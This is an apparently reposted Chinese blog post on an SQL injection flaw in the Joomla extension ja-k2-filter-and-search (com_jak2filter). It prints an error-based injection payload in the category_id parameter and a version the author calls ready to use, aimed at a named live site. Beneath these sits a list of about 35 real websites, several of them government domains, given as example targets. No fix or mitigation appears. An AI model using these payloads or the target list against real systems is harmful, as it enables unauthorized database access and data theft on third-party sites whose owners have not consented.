最新消息:

joomla插件ja-k2-filter-and-search注入漏洞

收集 pang0lin 338浏览 0评论

作者给出的payload

/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27

修改之后该一个可以直接使用的版本

http://www.dao-bzh.org/br/?category_id=111) and (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,(select version()),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- a&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5'

2

官方给出了案例

http://www.active-business.gr/

http://www.aquariancladding.co.uk/

http://www.arhitektura.mrt.gov.me/

http://www.athenian-yachts.gr

http://www.bathroom-shop.gr/

http://www.beactive.cy/

http://www.bowmansales.com/

http://www.cmvcapanema.pr.gov.br/

http://www.dao-bzh.org/

http://www.edeskati.gr/

http://www.gardeshgar-ir.com/

http://www.getravel.gr/

http://www.gndr.org/

http://www.holiday116.ru/

http://www.html-template.ru/

http://www.igctravel.co.uk/

http://www.international-nightlife.com/

http://www.internationalweddinginstitute.com/

http://www.kidsland-nsk.ru/

http://www.kingstonrv.com/

http://www.l-proekt.com/

http://www.mauritanie-online.com/

http://www.mice.ru/

http://www.nchasia.com/

http://www.ohg-bensberg.de/

http://www.rustyoptical.com/

http://www.seam.gr/

http://www.sherdoust.ir/

http://www.tasteofedm.ca/

http://www.transitec.net/

http://www.usasciencefestival.org/

https://proyectostipo.dnp.gov.co

https://www.lvivrada.gov.ua/

https://www.lvivrada.gov.ua/

https://www.moriel.org/

 

转载请注明:我是穿山甲,小弟穿山乙 » joomla插件ja-k2-filter-and-search注入漏洞

发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址